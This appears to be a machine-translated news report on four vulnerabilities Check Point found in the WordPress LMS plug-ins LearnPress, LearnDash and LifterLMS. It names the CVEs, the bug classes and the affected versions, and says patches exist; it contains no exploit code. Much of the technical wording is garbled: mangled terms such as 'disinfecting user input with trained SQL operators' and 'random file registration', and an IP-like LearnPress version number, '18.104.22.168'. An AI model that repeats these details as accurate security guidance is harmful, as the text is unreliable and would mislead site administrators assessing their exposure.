The popular WordPress plug-ins for creating Learning Management Systems (LMS) are full of vulnerabilities that can be used to monitor the platform, retrieve test responses and modify assessments.
Nowadays, these platforms have become the main instrument for conducting courses. Teachers, professors and perhaps hundreds of thousands of students for hundreds of thousands of students rely on them to keep their education as close as possible to the normal level.
LearnPress, LearnDash and LifterLMS are part of at least 100,000 websites. Some are run by accredited institutions such as schools, academies and universities (Florida, Washington, Michigan); others are used by companies for training (paid or free of charge).
Check Point’s security researchers found errors in the analysis of three WordPress plug-ins, the use of which is more or less trivial. They give technical details in a report released today.
In total, they identified four drawbacks that could have been used to steal personal data (names, e-mail addresses, usernames, passwords), change payment methods, change numbers, falsify certificates, obtain tests in advance or be a teacher.
Some vulnerabilities can be exploited without authentication and run remotely, i.e. a remote attacker can take over the LMS platform.
LearnPress versions 18.104.22.168 and earlier are vulnerable to Time-Based Blind SQL Injection (CVE-2020-6010), which is trivial to use and can be avoided by properly disinfecting user input with trained SQL operators.
Using this number, authenticated users can search the system for hashed usernames and passwords. The cracking of passwords depends on how strong they are.
Another failure on the same platform, turned off as CVE-2020-6011, allows an attacker to assume the role of teacher by increasing privileges in the system. This is possible thanks to the use of an outdated code that is still present in the product.
In versions of LearnDash under 3.1.6, researchers found an unauthenticated second-order SQL injection (CVE-2020-6009) that is more difficult to use but can be avoided with pre-defined instructions.
During the investigation of LifterLMS the researchers of Check Point Omri Gershovici and Saga Tzadik found that versions under 3.37.15 suffer from random file registration (CVE-2020-6008).
An attacker could exploit this vulnerability simply by linking malicious PHP code to his name. This may allow them to run the code on the server via an implemented webshell.
In the video below you can see how the researchers were able to exploit the vulnerabilities they found in the three LMS plug-ins for WordPress:
Check Point informed the developers of the three plugins about the discovered vulnerabilities and also released new versions to solve the problems. It is highly recommended that the administrators of the sites using these plug-ins install the updates.